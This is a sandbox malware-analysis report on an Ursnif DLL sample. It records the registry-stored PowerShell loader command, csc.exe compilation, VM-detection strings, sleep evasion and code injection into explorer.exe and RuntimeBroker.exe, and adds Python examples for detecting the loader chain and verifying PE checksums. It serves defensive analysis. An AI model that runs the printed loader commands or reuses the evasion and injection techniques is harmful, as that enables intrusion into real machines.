Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:464 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:82962 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES556B.tmp' 'c:\Users\user\AppData\Local\Temp\v0ewugxm\CSC796D60C17DC54E309D26CA9CC0469D24.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6171.tmp' 'c:\Users\user\AppData\Local\Temp\0oy3xkhb\CSC12D6740B38D4874A9168A78B923F8E.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: u.dll Static file information: File size 1154904 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.403057953.0000022AC2C50000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.409373229.00000285A6DD0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.427507513.0000000003F50000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.443790025.0000016755F5C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000023.00000000.429222350.0000000006300000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
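The command lines recorded above, both in the process-creation list and under the two Data Obfuscation signatures, describe one registry-resident loader chain: mshta.exe evaluates a script read from HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\Actidsrv, that script starts powershell.exe, which reads the basebapi value of the same key, decodes it as ASCII and runs it with iex, and that PowerShell in turn drives csc.exe with a .cmdline response file under %TEMP% (the Add-Type path), producing the two DLLs listed under "Drops PE files". The Python below is an added example, not part of the Joe Sandbox report or of the sample, showing how such a chain can be matched in process-creation telemetry. The event records are constructed from the command lines in this report; the PIDs, the two benign control records and the pid/ppid/image/cmdline field names are assumptions about a log schema, not values from the analysis. The csc.exe rule is low fidelity on its own, since Add-Type in ordinary administrative scripts produces the same csc.exe /noconfig /fullpaths @...\Temp\...cmdline invocation; the example raises its severity only when mshta.exe is in the process ancestry.

```python
import re

# Registry path this family uses to store its script and payload blobs. The
# separator appears as "\" or "\\" depending on the quoting layer (JScript
# string inside the HTA vs. PowerShell provider path), so allow either.
GUID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
REG_STORE = re.compile(r"AppDataLow\\+Software\\+Microsoft\\+" + GUID, re.I)
INLINE_HTA = re.compile(r"about:\s*<hta:application>", re.I)
# csc.exe driven by Add-Type: response file %TEMP%\<random>\<random>.cmdline
TEMP_CMDLINE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\\[^\\]+\.cmdline", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

MSHTA = r"C:\Windows\System32\mshta.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed process-creation records modelled on this report's command
# lines. PIDs and the benign control records (pid 40, 41) are invented.
SAMPLE_EVENTS = [
    {"pid": 26, "ppid": 2, "image": MSHTA,
     "cmdline": (r"mshta.exe about:<hta:application><script>resizeTo(1,1);"
                 r"eval(new ActiveXObject('WScript.Shell').regread('HKCU\\Software"
                 r"\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550"
                 r"\\Actidsrv'));if(!window.flag)close()</script>")},
    {"pid": 27, "ppid": 26, "image": PWSH,
     "cmdline": (r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp "
                 r"'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550')"
                 r".basebapi))")},
    {"pid": 29, "ppid": 27, "image": CSC,
     "cmdline": r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'"},
    # Benign control: an admin script that happens to use Add-Type.
    {"pid": 40, "ppid": 3, "image": PWSH,
     "cmdline": r"powershell.exe -NoProfile -File C:\ops\inventory.ps1"},
    {"pid": 41, "ppid": 40, "image": CSC,
     "cmdline": r"csc.exe /noconfig /fullpaths @'C:\Users\admin\AppData\Local\Temp\k2n1x0aa\k2n1x0aa.cmdline'"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev, by_pid):
    """Image basenames of all ancestors, nearest parent first (cycle-safe)."""
    chain, seen = [], set()
    parent = by_pid.get(ev["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        chain.append(basename(parent["image"]))
        parent = by_pid.get(parent["ppid"])
    return chain


def detect(events):
    """Return (pid, rule, severity) tuples for the loader chain described above."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        name, cmd = basename(ev["image"]), ev["cmdline"]
        lineage = ancestry(ev, by_pid)
        parent = lineage[0] if lineage else None
        if name == "mshta.exe" and INLINE_HTA.search(cmd):
            findings.append((ev["pid"], "mshta_inline_hta", "high"))
        if name in SHELLS and parent == "mshta.exe":
            findings.append((ev["pid"], "mshta_spawns_shell", "high"))
        if REG_STORE.search(cmd):
            findings.append((ev["pid"], "registry_hosted_payload", "high"))
        if name == "csc.exe" and TEMP_CMDLINE.search(cmd):
            # Add-Type in legitimate scripts looks identical; only the
            # mshta ancestry makes this a high-confidence hit.
            sev = "high" if "mshta.exe" in lineage else "low"
            findings.append((ev["pid"], "csc_compile_from_temp", sev))
    return findings


if __name__ == "__main__":
    for pid, rule, sev in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule} [{sev}]")
```

The registry pattern is the most durable of the four rules: the GUID-named key under HKCU\Software\AppDataLow\Software\Microsoft changes per infection, but the parent path and the GUID shape do not, and the same regex can be run over registry-set events as well as command lines.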
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00765BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00765BD5
PE file contains an invalid checksum
Source: 0oy3xkhb.dll.32.dr Static PE information: real checksum: 0x0 should be: 0xea29
Source: u.dll Static PE information: real checksum: 0x120401 should be: 0x120400
Source: v0ewugxm.dll.29.dr Static PE information: real checksum: 0x0 should be: 0x6ad8
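In these three lines "real checksum" is the OptionalHeader.CheckSum value stored in the file and "should be" is the value recomputed over the file contents. The two csc.exe outputs carry 0x0, which many non-Microsoft toolchains and dynamically compiled assemblies leave unset, so a zero field by itself says little. u.dll is the more interesting case: a nonzero stored value, 0x120401, that no longer matches the recomputed 0x120400, which indicates the file was modified after the checksum was written or the field was set by hand. The Python below is an added example, not code from the report, that reproduces this check. The checksum routine uses the same arithmetic as imagehlp's CheckSumMappedFile as reimplemented in tools such as pefile (32-bit sum with end-around carry, the CheckSum field skipped, folded to 16 bits, plus the file length); build_minimal_pe constructs a synthetic PE32 header purely as sample input and is not a loadable image.

```python
import struct


def pe_checksum(data, checksum_offset):
    """PE CheckSum over `data`, skipping the 4-byte field at `checksum_offset`.

    Same arithmetic as imagehlp's CheckSumMappedFile (as reimplemented in
    pefile): 32-bit sum with end-around carry, folded to 16 bits, plus the
    file length. A trailing partial dword is zero-padded.
    """
    if checksum_offset % 4:
        raise ValueError("CheckSum field must be 4-byte aligned")
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue  # the field itself never contributes
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)


def checksum_field_offset(data):
    """File offset of OptionalHeader.CheckSum; raises if the data is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # 4-byte signature, 20-byte COFF header, then CheckSum at +64 of the
    # optional header (same position for PE32 and PE32+).
    return e_lfanew + 4 + 20 + 64


def verify_checksum(data):
    """(stored value, recomputed value, match): the report's
    'real checksum: X should be: Y' comparison."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    computed = pe_checksum(data, off)
    return stored, computed, stored == computed


def build_minimal_pe(checksum=0):
    """Constructed header-only PE32 image used as sample input (not loadable):
    DOS header, PE signature, COFF header, 224-byte optional header carrying
    the given CheckSum."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # i386, 1 section, 0xE0-byte optional header, EXECUTABLE|32BIT|DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum field
    return dos + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    img = build_minimal_pe(0)
    stored, want, ok = verify_checksum(img)
    print(f"real checksum: {stored:#x} should be: {want:#x} valid={ok}")
```

Because the field is skipped during the sum, writing the computed value back into the header makes the file verify without changing the result, while any other byte change does; that is the property the triage check relies on, and why a stored nonzero value that is off by one, as with u.dll, points to post-link modification rather than a toolchain that never set the field.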
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002193 push ecx; ret 0_2_100021A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002140 push ecx; ret 0_2_10002149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00787177 push ecx; ret 0_2_00787187
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00786E10 push ecx; ret 0_2_00786E19
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007EBAD0 push edx; ret 0_2_007EBBD4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E544B pushfd ; iretd 0_2_007E544D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3412 push es; iretd 0_2_007E3413
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E197F push ds; retf 0_2_007E198D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3205 push cs; retf 0_2_007E3206
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E16B6 push ecx; ret 0_2_007E16B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007E3F3F pushfd ; ret 0_2_007E3F46
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4C131 push 3B000001h; retf 38_2_00E4C136

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (80 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2913
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6001
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0076E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0077888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00784FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00784FE1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007705EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_007705EF
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000023.00000000.432859058.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000027.00000002.1292477981.000001FC1125D000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000023.00000000.427109016.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: mshta.exe, 0000001A.00000002.389215125.000002442F93C000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000023.00000000.427133849.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000023.00000000.432351145.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00765BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00765BD5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007816A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_007816A5
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: EE0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 736E1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 10B0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 7FFB736E1580 value: EB
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
